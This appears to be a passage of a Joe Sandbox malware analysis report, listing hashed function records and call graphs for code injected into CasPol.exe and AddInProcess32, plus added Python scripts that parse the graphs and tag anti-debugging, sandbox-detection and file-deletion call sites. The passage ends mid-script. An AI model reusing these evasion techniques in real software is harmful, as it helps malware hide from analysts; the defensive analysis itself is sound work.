                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: da32abf5078c55e4b809063e69d7d1a8ce976df01d246f71460b2d8c743079de
                                                                                                                                                                                                                                                    • Instruction ID: ce2653b7c418e01a558a20290b33a5b83bfcfbe3c1f93cfc94b93a6359a31e4b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da32abf5078c55e4b809063e69d7d1a8ce976df01d246f71460b2d8c743079de
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D012831B140005FC761AA6CD465BAF77D6EB8A320F58A925E10AC7740DE21DC828390
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 48e3247d7a302728fb1ac2c621e1c783b983ab9c993cce30c6ed02294f95139e
• Instruction ID: 6eff65313911993f78c28b11c90e09990bc6841840ed0bcf208562bceff81195
• Opcode Fuzzy Hash: 48e3247d7a302728fb1ac2c621e1c783b983ab9c993cce30c6ed02294f95139e
• Instruction Fuzzy Hash: B021C0B5D01219ABCB10DF9AD884BDEFBB4FB48214F10812AE918A7300D774A954CBA5
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    • Opcode ID: 59e2352ca8c2f5da688f5bf59bb55c144cbd061219db907609f6955cb7e453a0
                                                                                                                                                                                                                                                    • Instruction ID: a6ae9b0bd7dcc457725f96e85e18e13723ad721e09bd48e0704514e9787dbd04
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59e2352ca8c2f5da688f5bf59bb55c144cbd061219db907609f6955cb7e453a0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91F0EC32F20628DBDB646565DC815DBB37AF784358F00443AED01E7744D771AC0187D0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7e7b4fe1bcac4756c872837065a4ba0e36321224bf66d838fea918149c962ea3
                                                                                                                                                                                                                                                    • Instruction ID: e7ba69139c974393598fa4f5cc552387108ba48ff5d8357abd6d8ecbb36862aa
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e7b4fe1bcac4756c872837065a4ba0e36321224bf66d838fea918149c962ea3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48E0D870D44108AFCF51DFA4DA457EE77B9EB01204F218CE6D408C7342F236DA118750
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 5fe340f08338b12c1c327ea6e2a51cd17153a567472a2ab1e3ae64f66df07fdc
                                                                                                                                                                                                                                                    • Instruction ID: a2d380b65fe21bdfb2608419ddc303093cee689cbea093a9b09b6d87e6d9556b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fe340f08338b12c1c327ea6e2a51cd17153a567472a2ab1e3ae64f66df07fdc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22F0B731A54119EBDB54DB94E859BAE7BB2BF88701F20012AE002A7285CB741D42CF91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 51ab8b9167b177b3b9488c634abfd5cd36c5352d43edae72c8507f2690bd4af0
                                                                                                                                                                                                                                                    • Instruction ID: f1b104941eb009c533f1c395be763e93c49f723540fb7325b9d2e21287ead981
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51ab8b9167b177b3b9488c634abfd5cd36c5352d43edae72c8507f2690bd4af0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00E0C271E10108ABDF51CEB1CA0579BB3ADD701204F2188A6D408C7341F272DA0183A0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 12.3%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 56
Total number of Limit Nodes: 5

The dump below is the graph as a flat token stream: each node is "<node id> <address>" followed by the Win32 API names called in that block, and "<id>-><id>" tokens are edges. It has two connected components. The small one is cc70c8 -> cc710c (CheckRemoteDebuggerPresent) -> cc714e, the anti-debugging check flagged in the signature list. The larger one, entered at cc098b, reaches DeleteFileW at cc83d8, cc83e8, cc7784 and cc8448 (six of the DeleteFileW call sites share the cc83d8/cc83e8 addresses) and reaches GlobalMemoryStatusEx at 628fc70 and 628fc80, each block calling it twice; querying physical memory size is a common sandbox/VM heuristic, consistent with the AntiVM detections above. Note that cc084e -> cc098b is a back-edge into that entry, so cc098b does not have in-degree zero.

execution_graph 27013 cc70c8 27014 cc710c CheckRemoteDebuggerPresent 27013->27014 27015 cc714e 27014->27015 27016 cc098b 27018 cc084e 27016->27018 27017 cc091b 27018->27016 27018->27017 27020 cc137f 27018->27020 27021 cc1372 27020->27021 27023 cc138b 27020->27023 27021->27018 27022 cc14be 27022->27018 27023->27022 27030 cc8620 27023->27030 27035 cc82da 27023->27035 27040 cc8161 27023->27040 27045 cc8170 27023->27045 27050 cc829c 27023->27050 27055 cc8339 27023->27055 27031 cc862a 27030->27031 27032 cc8644 27031->27032 27060 628fa20 27031->27060 27065 628fa30 27031->27065 27032->27023 27036 cc82df 27035->27036 27070 cc83d8 27036->27070 27074 cc83e8 27036->27074 27037 cc83cb 27037->27023 27042 cc8170 27040->27042 27041 cc83cb 27041->27023 27042->27041 27043 cc83d8 DeleteFileW 27042->27043 27044 cc83e8 DeleteFileW 27042->27044 27043->27041 27044->27041 27047 cc8189 27045->27047 27046 cc83cb 27046->27023 27047->27046 27048 cc83d8 DeleteFileW 27047->27048 27049 cc83e8 DeleteFileW 27047->27049 27048->27046 27049->27046 27052 cc82a1 27050->27052 27051 cc83cb 27051->27023 27053 cc83d8 DeleteFileW 27052->27053 27054 cc83e8 DeleteFileW 27052->27054 27053->27051 27054->27051 27056 cc833e 27055->27056 27058 cc83d8 DeleteFileW 27056->27058 27059 cc83e8 DeleteFileW 27056->27059 27057 cc83cb 27057->27023 27058->27057 27059->27057 27062 628fa30 27060->27062 27061 628fc5a 27061->27032 27062->27061 27063 628fc70 GlobalMemoryStatusEx GlobalMemoryStatusEx 27062->27063 27064 628fc80 GlobalMemoryStatusEx GlobalMemoryStatusEx 27062->27064 27063->27062 27064->27062 27067 628fa45 27065->27067 27066 628fc5a 27066->27032 27067->27066 27068 628fc70 GlobalMemoryStatusEx GlobalMemoryStatusEx 27067->27068 27069 628fc80 GlobalMemoryStatusEx GlobalMemoryStatusEx 27067->27069 27068->27067 27069->27067 27072 cc83f8 27070->27072 27071 cc842a 27071->27037 27072->27071 27078 cc7784 27072->27078 27076 cc83f8 27074->27076 27075 cc842a 27075->27037 27076->27075 27077 cc7784 DeleteFileW 27076->27077 27077->27075 27079 cc8448 DeleteFileW 27078->27079 27081 cc84c7 27079->27081 27081->27071
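Reading API reachability off the execution_graph token stream by eye does not scale past a few dozen nodes. The following parser is an added example written for this page; it is not Joe Sandbox code, and the token format is inferred from the dump itself (node id, address, optional API names, then id->id edges). The embedded sample is an excerpt copied from the report's execution_graph dump and trimmed to the paths that reach an API call; the full dump can be passed in unchanged, since parsing is whitespace-agnostic. All function names are the author's own.

```python
"""Turn a Joe Sandbox execution_graph text dump into an API-reachability map.

Added example for this report page; it is not Joe Sandbox code.  The dump
format is inferred from the page: a flat token stream of
"<node id> <address> [<API name> ...]" declarations and "<id>-><id>" edges.
Function and variable names are the author's own.
"""
import re
from collections import deque

# Excerpt copied from the report's execution_graph dump and trimmed to the
# paths that reach an API call (constructed sample input, not a full graph).
GRAPH_TEXT = """
27013 cc70c8 27014 cc710c CheckRemoteDebuggerPresent 27013->27014 27015 cc714e 27014->27015
27016 cc098b 27018 cc084e 27016->27018 27017 cc091b 27018->27016 27018->27017
27020 cc137f 27018->27020 27021 cc1372 27020->27021 27023 cc138b 27020->27023 27021->27018
27022 cc14be 27022->27018 27023->27022 27030 cc8620 27023->27030 27035 cc82da 27023->27035
27031 cc862a 27030->27031 27032 cc8644 27031->27032 27060 628fa20 27031->27060 27032->27023
27036 cc82df 27035->27036 27070 cc83d8 27036->27070 27037 cc83cb 27037->27023
27062 628fa30 27060->27062 27061 628fc5a 27061->27032 27062->27061
27063 628fc70 GlobalMemoryStatusEx GlobalMemoryStatusEx 27062->27063 27063->27062
27072 cc83f8 27070->27072 27071 cc842a 27071->27037 27072->27071 27078 cc7784 27072->27078
27079 cc8448 DeleteFileW 27078->27079 27081 cc84c7 27079->27081 27081->27071
"""

_ID = re.compile(r"^\d+$")
_EDGE = re.compile(r"^(\d+)->(\d+)$")
_API = re.compile(r"^[A-Za-z_]\w*$")


def parse_graph(text):
    """Return (nodes, edges).

    nodes: id -> (address, [API names called in that block])
    edges: id -> set of successor ids
    """
    nodes, edges = {}, {}
    tokens = text.split()          # whitespace-agnostic, so line wraps do not matter
    i, cur = 0, None
    while i < len(tokens):
        tok = tokens[i]
        m = _EDGE.match(tok)
        if m:
            src, dst = m.groups()
            edges.setdefault(src, set()).add(dst)
            edges.setdefault(dst, set())
            cur = None
        elif _ID.match(tok):
            # "<id> <address>": the address token is taken unconditionally
            nodes[tok] = (tokens[i + 1], [])
            edges.setdefault(tok, set())
            cur = tok
            i += 1
        elif cur is not None and _API.match(tok) and any(c.isupper() for c in tok):
            # Win32 API names follow the address; a repeated name means the
            # block calls it more than once, so keep a list rather than a set.
            nodes[cur][1].append(tok)
        else:
            raise ValueError(f"unexpected token {tok!r} at position {i}")
        i += 1
    return nodes, edges


def nodes_at(nodes, address):
    """All node ids at an address (the dump emits one node per call site, so an
    address such as cc83d8 can appear several times)."""
    return [nid for nid, (addr, _) in nodes.items() if addr == address]


def reachable_apis(nodes, edges, start_address):
    """BFS over the edge list from every node at start_address; return the
    sorted set of API names reachable from it (cycles are handled by `seen`)."""
    queue = deque(nodes_at(nodes, start_address))
    if not queue:
        raise KeyError(f"no node at address {start_address}")
    seen, apis = set(queue), set()
    while queue:
        nid = queue.popleft()
        apis.update(nodes[nid][1])
        for nxt in edges.get(nid, ()):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return sorted(apis)


def entry_points(nodes, edges):
    """Addresses of nodes with no incoming edge.  A back-edge into a function
    entry (cc084e -> cc098b in this dump) hides that entry, so treat the result
    as a hint and pass known entries to reachable_apis explicitly."""
    targets = {dst for dsts in edges.values() for dst in dsts}
    return [addr for nid, (addr, _) in nodes.items() if nid not in targets]


def api_call_sites(nodes):
    """API name -> sorted addresses of the blocks that call it."""
    sites = {}
    for addr, apis in nodes.values():
        for api in apis:
            sites.setdefault(api, set()).add(addr)
    return {api: sorted(addrs) for api, addrs in sites.items()}


if __name__ == "__main__":
    n, e = parse_graph(GRAPH_TEXT)
    print("entry candidates:", entry_points(n, e))
    for addr in ("cc70c8", "cc098b"):
        print(addr, "->", reachable_apis(n, e, addr))
    print(api_call_sites(n))
```

On the excerpt, entry_points reports only cc70c8: the cc084e -> cc098b back-edge gives the second entry an incoming edge, which is why the function is documented as a hint rather than ground truth. Asking reachable_apis for cc098b directly returns DeleteFileW and GlobalMemoryStatusEx, while cc70c8 reaches only CheckRemoteDebuggerPresent, matching the two components described above.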

Control-flow Graph

Function starting at 62855a8 (basic blocks 62855a8 through 6285cd7). The rendered graph distinguishes Executed and Not Executed blocks; only the raw basic-block edge list survives in the text export and is not reproduced here.
Strings
Memory Dump Source
• Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
Similarity
• API ID:
• String ID: $
• API String ID: 0-3993045852
• Opcode ID: d5517ab7a709cad89dc3dfdfbce47b8362b53f7ce9169fa39ed508b1321f834c
• Instruction ID: 103caab51c06931e688e02bc9875b4f0ae972c63a92a34bc3a831f52ef90114d
• Opcode Fuzzy Hash: d5517ab7a709cad89dc3dfdfbce47b8362b53f7ce9169fa39ed508b1321f834c
• Instruction Fuzzy Hash: 8422D475E212158FDFA0DB65C8806AEBBB2FF84310F248466E815BB395DA35DC41CB91
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9d2dd82df96e657a77cd3cd1d2e52b6c41679dcd7255321be7e1f84ecd689c97
• Instruction ID: bd5d48c789b9d187db1898ab7c0cc0944ba397d228bf70a03824ad3a8aa32427
• Opcode Fuzzy Hash: 9d2dd82df96e657a77cd3cd1d2e52b6c41679dcd7255321be7e1f84ecd689c97
• Instruction Fuzzy Hash: 25D23A34E11205CFDB64EB68C894A9DB7B2FF89310F5485A9D809AB391DB35ED85CF80
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 9d887ea54449ef898708b85527592c2f9d613428e444e37b8977ebf94fdae671
                                                                                                                                                                                                                                                    • Instruction ID: 13ff1e249bc34b24e3019010273435072a89be2c9f898e1c1e6d87ae3f7631ca
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d887ea54449ef898708b85527592c2f9d613428e444e37b8977ebf94fdae671
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C062A230A212059FDB54EB68D994BADBBF2FF85314F148469E806DB391DB35EC46CB80
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: bab528c891fc92a2fabff8fbb0678f8bf3b88e46da623b9831a0d59a165bf180
                                                                                                                                                                                                                                                    • Instruction ID: 93ead41384319ab09f8400a53772621cca03a039ae448a2354ccca4cfb59a1d4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bab528c891fc92a2fabff8fbb0678f8bf3b88e46da623b9831a0d59a165bf180
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D527470E2120A8FDF64EB68D8907ADB7B1FB45311F64842EE805EB395DA34EC85CB51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 491af377eca11b375c21b00cd949cc00b5738cacd6ec13ff1fd8aaf907d3eadf
                                                                                                                                                                                                                                                    • Instruction ID: 87732d86620ca9514318bd086ae13e690ca1ff4ed440b357a6883f7023cf3998
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 491af377eca11b375c21b00cd949cc00b5738cacd6ec13ff1fd8aaf907d3eadf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B832C571F212059FDB54EB68D890BADB7B6FB89310F508525E805E7385DB34EC42CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 27c4e75881658ad95f4147635d6896c5a4c1b9a94c0ace433adac692fd59c503
                                                                                                                                                                                                                                                    • Instruction ID: ae5425eefff394ce205e13cc733c152cb83ef2c318f72a0f04afba9379b2f320
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27c4e75881658ad95f4147635d6896c5a4c1b9a94c0ace433adac692fd59c503
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9402BF30B212098FDB54EB68D8907AEBBE2FF85304F648569D805DB385DB75EC46CB90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 913 ccf438-ccf461 916 ccf467-ccf4f4 GlobalMemoryStatusEx 913->916 917 ccf463-ccf466 913->917 921 ccf4fd-ccf525 916->921 922 ccf4f6-ccf4fc 916->922 922->921
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 00CCF4E7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1622320992.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_cc0000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1890195054-0
                                                                                                                                                                                                                                                    • Opcode ID: 8135ed975ccffa4d19d9b6b71f2e9f16e91735140985b4c886b2c6f428fb59e7
                                                                                                                                                                                                                                                    • Instruction ID: c1148fdff5def0254ee4c35e5634c6f515b217fbcf3421163f6a17a96552db61
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8135ed975ccffa4d19d9b6b71f2e9f16e91735140985b4c886b2c6f428fb59e7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6121ABB1C002599FDB14CFAAE841BDEBBF4EF49320F15856AD814A7341D7789942CFA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1430 cc70c1-cc714c CheckRemoteDebuggerPresent 1433 cc714e-cc7154 1430->1433 1434 cc7155-cc7190 1430->1434 1433->1434
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 00CC713F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1622320992.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_cc0000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3662101638-0
                                                                                                                                                                                                                                                    • Opcode ID: 5285127329da9cc921cc6691cf0d4cd5631123bb413a7fda298e33fb8c63189c
                                                                                                                                                                                                                                                    • Instruction ID: 358f3777a87860f6f67cdfc4e168ea90e1e2f5b80a9e12ba0c9c01c82a8549cc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5285127329da9cc921cc6691cf0d4cd5631123bb413a7fda298e33fb8c63189c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52217AB19003598FCB14CF9AC484BEEBBF5EF49310F14846AE459A7241D778A944CF60
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

Basic blocks: 1437 cc70c8-cc714c (CheckRemoteDebuggerPresent), 1439 cc714e-cc7154, 1440 cc7155-cc7190
Edges: 1437->1439, 1437->1440, 1439->1440
APIs
• CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 00CC713F
Memory Dump Source
• Source File: 0000001F.00000002.1622320992.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_cc0000_CasPol.jbxd
Similarity
• API ID: CheckDebuggerPresentRemote
• String ID:
• API String ID: 3662101638-0
• Opcode ID: f8ed56703a08a450b12081c03d6899d7d5aff5f3008148260c803d0c04d2e51a
• Instruction ID: af20eaf65cc2fff49197c37f8eab574fe41196f7e00eb3362d1d400438fc36b3
• Opcode Fuzzy Hash: f8ed56703a08a450b12081c03d6899d7d5aff5f3008148260c803d0c04d2e51a
• Instruction Fuzzy Hash: 7D2148B18002598FCB14CF9AD484BEEBBF5EF49310F14845AE859A3240D778A944CF60
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
Basic blocks: 1443 cc7784-cc8492, 1446 cc849a-cc84c5 (DeleteFileW), 1447 cc8494-cc8497, 1448 cc84ce-cc84f6, 1449 cc84c7-cc84cd
Edges: 1443->1446, 1443->1447, 1446->1448, 1446->1449, 1447->1446, 1449->1448
APIs
• DeleteFileW.KERNEL32(00000000), ref: 00CC84B8
Memory Dump Source
• Source File: 0000001F.00000002.1622320992.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_cc0000_CasPol.jbxd
Similarity
• API ID: DeleteFile
• String ID:
• API String ID: 4033686569-0
• Opcode ID: d796f6b14a7bfb22025e0bb7660e8659b71e1520f593e13d966c171a7d1dd676
• Instruction ID: 61931d80f15f7e554c3291a097c0db11f6ebc4ce8187cde99e3d20d02c04ad42
• Opcode Fuzzy Hash: d796f6b14a7bfb22025e0bb7660e8659b71e1520f593e13d966c171a7d1dd676
• Instruction Fuzzy Hash: F52127B1C0061A9BDB14DF9AC544BEEFBB4EB48320F148169E818A7241D778A945CFA5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
Basic blocks: 1452 cc8441-cc8492, 1455 cc849a-cc84c5 (DeleteFileW), 1456 cc8494-cc8497, 1457 cc84ce-cc84f6, 1458 cc84c7-cc84cd
Edges: 1452->1455, 1452->1456, 1455->1457, 1455->1458, 1456->1455, 1458->1457
APIs
• DeleteFileW.KERNEL32(00000000), ref: 00CC84B8
Memory Dump Source
• Source File: 0000001F.00000002.1622320992.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_cc0000_CasPol.jbxd
Similarity
• API ID: DeleteFile
• String ID:
• API String ID: 4033686569-0
• Opcode ID: 61c01d0fc3f1e5391615ad03428144506956bf8a30ecb5de33bf2f43aabd162c
• Instruction ID: 2054bce0baa37694045b0f06485df1d10ffc3e2062f590166be8cf3d73a9a392
• Opcode Fuzzy Hash: 61c01d0fc3f1e5391615ad03428144506956bf8a30ecb5de33bf2f43aabd162c
• Instruction Fuzzy Hash: 042158B1C0065A9BCB14CF9AC444BEEFBF4EF08320F148129D818A7240D778A945CFA4
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
Basic blocks: 1461 ccf480-ccf4f4 (GlobalMemoryStatusEx), 1463 ccf4fd-ccf525, 1464 ccf4f6-ccf4fc
Edges: 1461->1463, 1461->1464, 1464->1463
APIs
• GlobalMemoryStatusEx.KERNEL32 ref: 00CCF4E7
Memory Dump Source
• Source File: 0000001F.00000002.1622320992.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_cc0000_CasPol.jbxd
Similarity
• API ID: GlobalMemoryStatus
• String ID:
• API String ID: 1890195054-0
• Opcode ID: 023e6cb28fea6a5f2fcd494a618622746f8f127b408d8d866cd595739ee4c3aa
• Instruction ID: 4744e17b5bc337ea8d333e663bbfd98f1ce98ba4167cbeec924e167ab8251e90
• Opcode Fuzzy Hash: 023e6cb28fea6a5f2fcd494a618622746f8f127b408d8d866cd595739ee4c3aa
• Instruction Fuzzy Hash: CD1123B1C0065A9BDB14DF9AD444BDEFBF5AF48320F14816AD818A7240D378A945CFA5
Uniqueness
Uniqueness Score: -1.00%
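The function records above list, per basic block, the Win32 APIs reached by the code injected into CasPol.exe (memory dump 0000001F.00000002, base 00CC0000). When triaging a report like this one, the first thing an analyst wants is the call-site addresses of the anti-analysis checks, so they can be patched or hooked before re-running the sample. The script below is an added example, not part of the Joe Sandbox report or of the sample; it parses the `APIs` and `Memory Dump Source` bullets of such records and tags each call site. It assumes the bullet layout shown on this page, and the category table is the author's: the report itself only states that CheckRemoteDebuggerPresent is a debugger check; reading GlobalMemoryStatusEx as a RAM-size sandbox heuristic and DeleteFileW as cleanup is an assumption. The embedded report excerpt is constructed to mirror the three entries above.

```python
import re
from collections import defaultdict

# Constructed excerpt modelled on the report's per-function records
# (same call sites as the three entries above; not the report text itself).
SAMPLE_REPORT = """\
Control-flow Graph
APIs
• CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 00CC713F
Memory Dump Source
• Source File: 0000001F.00000002.1622320992.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
Control-flow Graph
APIs
• DeleteFileW.KERNEL32(00000000), ref: 00CC84B8
Memory Dump Source
• Source File: 0000001F.00000002.1622320992.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
Control-flow Graph
APIs
• GlobalMemoryStatusEx.KERNEL32 ref: 00CCF4E7
Memory Dump Source
• Source File: 0000001F.00000002.1622320992.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
"""

# Assumed categories (author's table). The report only asserts the
# CheckRemoteDebuggerPresent one; the RAM-sizing and cleanup readings are heuristics.
API_TAGS = {
    "CheckRemoteDebuggerPresent": "anti-debug: debugger presence check",
    "IsDebuggerPresent": "anti-debug: debugger presence check",
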